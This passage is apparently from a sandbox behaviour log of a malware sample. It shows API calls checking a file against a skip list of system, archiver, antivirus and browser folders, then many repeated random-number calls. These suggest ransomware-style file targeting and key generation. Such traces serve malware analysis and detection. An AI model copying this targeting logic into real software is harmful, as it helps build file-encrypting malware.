returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*AppData*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\winrar\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\Internet Explorer\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\java\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\TeamViewer\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\windows\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\ESET\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\AVG\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\AVIRA\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*\\AVAST Software\\*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*Atheros*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*Realtek*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*bootmgr*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*boot*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*boot*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*CONFIG.SYS*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*IO.SYS*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*MSDOS.SYS*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*NTDETECT.COM*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*ntldr*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*chrome*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*opera*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*firefox*") returned 0 [0204.456] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF", pszSpec="*") returned 1 [0204.456] strlen (_Str="NMoreira") returned 0x8 [0204.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.457] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.458] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.459] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 